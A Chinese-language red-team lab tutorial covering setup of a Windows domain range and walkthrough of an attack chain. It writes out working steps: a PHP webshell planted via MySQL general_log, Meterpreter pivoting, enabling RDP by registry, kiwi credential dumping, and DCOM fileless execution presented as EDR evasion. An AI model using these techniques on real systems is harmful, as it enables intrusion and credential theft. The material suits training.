1. 红队靶场环境搭建全流程搭建红队实战靶场是安全研究的必修课但很多新手常被复杂的网络配置劝退。我去年给某金融企业做内网渗透培训时就遇到过学员集体卡在靶机互连阶段的尴尬场面。下面分享一套经过20企业实战验证的搭建方法。首先需要准备三台虚拟机Windows Server 2008域控、Windows 7Web服务器、Windows 2003域成员。建议使用VMware Workstation Pro兼容性最好。下载好OVA镜像后会遇到第一个关键点——多网卡配置# 查看现有网卡 ipconfig /all # 为Win7添加第二块网卡VMnet1这里有个细节坑Win7默认防火墙会阻止跨网段通信。我建议初期测试时直接关闭防火墙等环境调通后再按需开启netsh advfirewall set allprofiles state off网络拓扑要遵循跳板机原则Kali攻击机与Win7的VMnet1网卡同网段如192.168.41.0/24Win7的第二块网卡与域内机器组成VMnet2网段如192.168.52.0/24。这种设计模拟了真实企业DMZ区与内网隔离的场景。2. ATTCK攻击链复现详解2.1 初始访问阶段实战当nmap扫描发现Win7仅开放5357端口时别急着放弃。去年某次攻防演练中我就靠这个不起眼的端口拿下了目标。关键操作是启动PHPStudy服务# Kali端扫描验证 nmap -sV -p 80,5357 192.168.41.128如果发现80端口仍不可达检查两个易错点Win7的VMnet1网卡是否配置了正确网关通常为.1或.2是否以管理员身份运行了PHPStudy通过phpMyAdmin拿shell时推荐用日志写入法比直接导出一句话更隐蔽。最近某次HW行动中防守方就专门监控了SELECT INTO OUTFILE语句-- 修改全局日志配置 SET GLOBAL general_log ON; SET GLOBAL general_log_file C:/phpStudy/WWW/shell.php; -- 写入payload SELECT ?php system($_GET[cmd]);?;2.2 横向移动技巧精要当需要跨网段渗透时90%的新手会卡在路由配置。去年培训时有个学员死活连不上域控最后发现是忘了设置MSF的路由# 在meterpreter会话中 run autoroute -s 192.168.52.0/24对于新版Kaliproxychains的配置有变化。如果遇到代理失败记得注释掉/etc/proxychains4.conf中的dynamic_chain改用socks4 127.0.0.1 1080碰到445端口开放但MS17-010利用失败时可以尝试命令注入方式。上周某次演练中我们就用这招绕过了EDR监控set COMMAND REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f3. 高频问题排查指南3.1 网络连通性故障当靶机之间无法通信时按这个检查清单逐步排查确认所有虚拟机使用相同VMnet模式建议用NAT检查各网卡是否分配到正确IP段测试网关可达性如ping 192.168.41.1关闭各主机防火墙临时测试最近帮某厂商调试时发现Win2003默认禁用了ICMP响应导致ping不通但实际网络是通的。这种情况可以用telnet测试具体端口# 在Win7上测试域控的445端口 Test-NetConnection 192.168.52.138 -Port 4453.2 权限维持异常处理用kiwi模块抓密码时如果返回空结果可能是权限不够。先确保已经迁移到64位系统进程# 查看进程列表 ps # 迁移到类似services.exe的进程 migrate 488遇到mimikatz报错时可以尝试改用kiwi模块。在最近一次攻防中目标系统打了mimikatz补丁但kiwi依然有效load kiwi creds_all4. 企业级攻防对抗进阶4.1 域环境深度利用拿到域控权限后别急着清理痕迹。先收集这些关键信息域策略gpresult /z信任关系nltest /domain_trusts服务账户Get-ADServiceAccount去年某次红队行动中我们通过分析域策略发现目标使用了LAPS本地管理员密码解决方案及时调整了攻击路线。4.2 对抗安全设备技巧当遇到EDR拦截时可以尝试这些方法使用原生Windows命令替代powershell通过certutil下载文件会被部分EDR忽略利用COM组件执行命令# 无文件执行示例 $com [activator]::CreateInstance([type]::GetTypeFromProgID(MMC20.Application)) $com.Document.ActiveView.ExecuteShellCommand(cmd.exe,$null,/c whoami,7)这种方法的优势是不需要落地文件直接内存执行。上个月在某制造企业测试时成功绕过了某知名EDR的检测。